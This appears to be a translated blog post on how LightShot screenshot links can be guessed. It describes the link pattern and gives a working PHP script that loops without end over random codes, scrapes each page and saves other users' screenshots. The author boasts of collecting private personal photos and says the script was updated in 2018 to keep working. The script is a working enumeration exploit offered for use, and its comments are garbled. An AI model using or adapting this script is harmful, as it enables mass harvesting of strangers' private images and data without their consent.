LightShot and other screenshots

Today I stumbled upon one “vulnerability” of the service for LightShot instant screenshots.

It all started with the fact that I uploaded another screenshot and remembered a recent article on Habré, where user data on links were bounded by brute force.
Having tried to change one letter in the URL, I kindly gave someone else a screenshot.

For a start, I tried to understand by what mask a link of the form http://prntscr.com/1npf9n is generated.
After some experiments, I realized that the mask is most likely of the form prntscr.com/1 [a-z0–9] (after the number 1, there are from 4 to 5 random characters)
I also tried links http://prntscr.com/login and http://prntscr.com/admin , for which I also saw screenshots.
Most likely, the algorithm corresponded a bit, and the current link generation algorithm is designed so that having exhausted all combinations, either the link length will increase to 7 characters, or the mask will become prntscr.com/2[a-z0–9]
')
In the process I discovered one feature of the service - it does not store pictures on its server, but uploads them via the imgur.com API and imageshack.us

I was tormented by curiosity: "Is it possible to download all the screenshots?"
And it was decided to write a small script. At first I wanted to write in Python, but it was not installed on my working laptop, but Denwer and PHP came to hand.
Please do not kick me for my code, which was written in 5 minutes in a hurry. He is quite a worker.

<?php set_time_limit(0); //       ob_implicit_flush(); function random_string($length) { //     $chars = "abcdefghijklmnopqrstuvwxyz1234567890"; //     $numChars = strlen($chars); //   $chars $string = ''; //    for ($i = 0; $i < $length; $i++) { //   $string.= substr($chars, rand(1, $numChars) - 1, 1); } return $string; //    } function get_http_response_code($url) { //   http  $headers = get_headers($url); return substr($headers[0], 9, 3); } if (!file_exists('lightshot_images')) { //     ,   mkdir('lightshot_images', 0777); } $options = array( 'http' => array( 'method' => "GET", 'header' => "Accept-language: en\r\n" . "User-Agent: Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.102011-10-16 20:23:10\r\n" ) ); $context = stream_context_create($options); while (1) { $randstring = random_string(5); //    $htmldata = file_get_contents('https://prnt.sc/m' . $randstring, false, $context); //        preg_match_all('/<meta name=\"twitter:image:src\" content=\"(.*?)\"\/>/is', $htmldata, $img_url); //   url  if (strlen($img_url[1][0]) > 1) { //    ,   1 -      $imgs = str_replace('//st.prntscr', 'https://st.prntscr', $img_url[1][0]); $localname = array_pop(explode('/', $img_url[1][0])); //          (.. imagename.png) $localpath = "./lightshot_images/" . $localname; //      . if (get_http_response_code($imgs) != "200") { echo "<span style='color:red;display:block;margin-bottom:10px;font-size:14px;'>404.   " . $imgs . "    :(</span>"; } else { file_put_contents($localpath, file_get_contents($imgs, false, $context)); // ,      curl,         echo "<span style='color:green;display:block;margin-bottom:10px;font-size:14px;'> - " . $localname . " , url - http://prntscr.com/m" . $randstring . " ,   " . $imgs . "</span>"; } } else { echo "<span style='color:red;display:block;margin-bottom:10px;font-size:14px;'>  http://prntscr.com/m" . $randstring . "  </span>"; } } ?> 

The result of the execution in the browser (as you can see, ~ 95% of the random links generated generate screenshots)

As a result, I downloaded a whole bunch of screenshots, among which there are too personal photos of people, screenshots of the code, and many other interesting things.

UPD 2018: Corrected the script to reflect the changes that occurred on the lightshot. Now it works again.